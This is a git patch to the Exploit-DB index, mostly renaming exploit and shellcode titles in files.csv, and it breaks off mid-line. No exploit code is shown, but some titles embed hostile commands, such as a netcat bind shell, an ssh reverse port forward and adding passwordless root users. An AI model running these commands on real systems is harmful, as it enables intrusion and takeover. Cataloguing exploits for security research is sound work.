From ed107bc7117bfb3e344240e99efa0970e62db533 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 12 Jul 2017 05:01:24 +0000 Subject: [PATCH] DB: 2017-07-12 9 new exploits Apache 2.0.52 - HTTP GET request Denial of Service Apache 2.0.52 - GET Request Denial of Service Microsoft IIS - Malformed HTTP Request Denial of Service (1) Microsoft IIS - Malformed HTTP Request Denial of Service (2) Microsoft IIS - HTTP Request Denial of Service (1) Microsoft IIS - HTTP Request Denial of Service (2) Microsoft IIS - Malformed HTTP Request Denial of Service Microsoft IIS - HTTP Request Denial of Service Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC) Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC) Allegro RomPager 2.10 - Malformed URL Request Denial of Service Allegro RomPager 2.10 - URL Request Denial of Service AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service Netwin SurgeFTP 1.0b - Malformed Request Denial of Service Netwin SurgeFTP 1.0b - Denial of Service iCal 3.7 - Malformed HTTP Request Denial of Service iCal 3.7 - HTTP Request Denial of Service 3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service 3ware Disk Managment 1.10 - HTTP Request Denial of Service Pi3Web 2.0.1 - Malformed GET Request Denial of Service Pi3Web 2.0.1 - GET Request Denial of Service Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service Linksys PSUS4 PrintServer - POST Request Denial of Service Multiple IEA Software Products - HTTP POST Request Denial of Service Multiple IEA Software Products - POST Request Denial of Service Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow Pelco VideoXpert 1.12.105 - Privilege Escalation Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH) Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass) NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass) Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) (Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes) (Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes) Linux/x86-64 - flush iptables rules Shellcode (84 bytes) Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes) Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes) Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes) Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes) Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes) Linux/x86 - File unlinker Shellcode (18+ bytes) Linux/x86 - Perl script execution Shellcode (99+ bytes) Linux/x86 - file reader Shellcode (65+ bytes) Linux/x86 - File Unlinker Shellcode (18+ bytes) Linux/x86 - Perl Script Execution Shellcode (99+ bytes) Linux/x86 - File Reader Shellcode (65+ bytes) Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes) Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes) Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes) Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes) Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes) Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes) Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes) Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes) Linux/x86 - Radically Self-Modifying Shellcode (70 bytes) Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes) Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes) Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes) Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) Linux/x86 - Add User 't00r' Shellcode (82 bytes) Linux/x86 - Add User (t00r) Shellcode (82 bytes) Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes) Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes) Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes) Linux/x86 - Add User 'z' Shellcode (70 bytes) Linux/x86 - Add User (z) Shellcode (70 bytes) Linux/x86 - hard / unclean reboot Shellcode (29 bytes) Linux/x86 - hard / unclean reboot Shellcode (33 bytes) Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes) Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes) Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes) Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes) Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes) Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes) Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes) Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes) Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes) Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes) Linux/x86 - Remote Port Forwarding Shellcode (87 bytes) Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes) Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes) Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes) Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes) Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes) Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes) Linux/x86 - /bin/sh ROT7 Encoded Shellcode Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes) Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes) Linux/x86-64 - Bind NetCat Shellcode (64 bytes) Linux/x86-64 - Bind Netcat Shellcode (64 bytes) Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes) Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes) Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes) Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes) Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes) Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes) Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes) Linux/x86-64 - Reverse NetCat Shellcode (72 bytes) Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes) Linux/x86-64 - Reverse Netcat Shellcode (72 bytes) Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes) Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access) Pelco Sarix/Spectra Cameras - Remote Code Execution Pelco VideoXpert 1.12.105 - Directory Traversal Pelco VideoXpert 1.12.105 - Information Disclosure NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection --- files.csv | 148 ++--- platforms/hardware/webapps/42307.txt | 168 ++++++ platforms/hardware/webapps/42308.txt | 82 +++ platforms/hardware/webapps/42309.txt | 191 +++++++ platforms/linux/{remote => webapps}/42306.txt | 0 platforms/linux/webapps/42314.txt | 28 + platforms/windows/local/42310.txt | 107 ++++ platforms/windows/remote/42315.py | 538 ++++++++++++++++++ platforms/windows/webapps/42311.txt | 149 +++++ platforms/windows/webapps/42312.txt | 81 +++ 10 files changed, 1422 insertions(+), 70 deletions(-) create mode 100755 platforms/hardware/webapps/42307.txt create mode 100755 platforms/hardware/webapps/42308.txt create mode 100755 platforms/hardware/webapps/42309.txt rename platforms/linux/{remote => webapps}/42306.txt (100%) create mode 100755 platforms/linux/webapps/42314.txt create mode 100755 platforms/windows/local/42310.txt create mode 100755 platforms/windows/remote/42315.py create mode 100755 platforms/windows/webapps/42311.txt create mode 100755 platforms/windows/webapps/42312.txt diff --git a/files.csv b/files.csv index 8547530fb..89e6a75fe 100644 --- a/files.csv +++ b/files.csv @@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port 843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 -855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 +855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 @@ -264,12 +264,12 @@ id,file,description,date,author,platform,type,port 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0 1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 -1376,platforms/windows/dos/1376.c,"Microsoft IIS - Malformed HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 -1377,platforms/windows/dos/1377.pl,"Microsoft IIS - Malformed HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0 +1376,platforms/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 +1377,platforms/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 -1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 +1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 @@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 -5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 +5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 @@ -1274,7 +1274,7 @@ id,file,description,date,author,platform,type,port 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21 10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 -10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - Malformed URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80 +10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80 10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos,0 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 @@ -2364,7 +2364,7 @@ id,file,description,date,author,platform,type,port 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0 -19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service",2000-04-12,eAX,windows,dos,0 +19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service",2000-04-12,eAX,windows,dos,0 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0 @@ -2499,7 +2499,7 @@ id,file,description,date,author,platform,type,port 20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos,0 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0 -20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 +20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0 @@ -2749,7 +2749,7 @@ id,file,description,date,author,platform,type,port 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0 22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 -22117,platforms/windows/dos/22117.txt,"iCal 3.7 - Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 +22117,platforms/windows/dos/22117.txt,"iCal 3.7 - HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0 22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 @@ -2765,7 +2765,7 @@ id,file,description,date,author,platform,type,port 22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",linux,dos,0 22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos,0 -22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0 +22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0 22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0 22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 @@ -2850,7 +2850,7 @@ id,file,description,date,author,platform,type,port 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0 -22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 +22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos,0 @@ -3068,7 +3068,7 @@ id,file,description,date,author,platform,type,port 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 -23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 +23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0 @@ -3318,7 +3318,7 @@ id,file,description,date,author,platform,type,port 25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0 -25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 +25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 @@ -3922,7 +3922,7 @@ id,file,description,date,author,platform,type,port 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 -31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 +31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 @@ -4015,7 +4015,7 @@ id,file,description,date,author,platform,type,port 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0 31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0 -31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 +31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0 31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0 @@ -4285,7 +4285,7 @@ id,file,description,date,author,platform,type,port 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 -33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service",2010-01-27,"RedTeam Pentesting 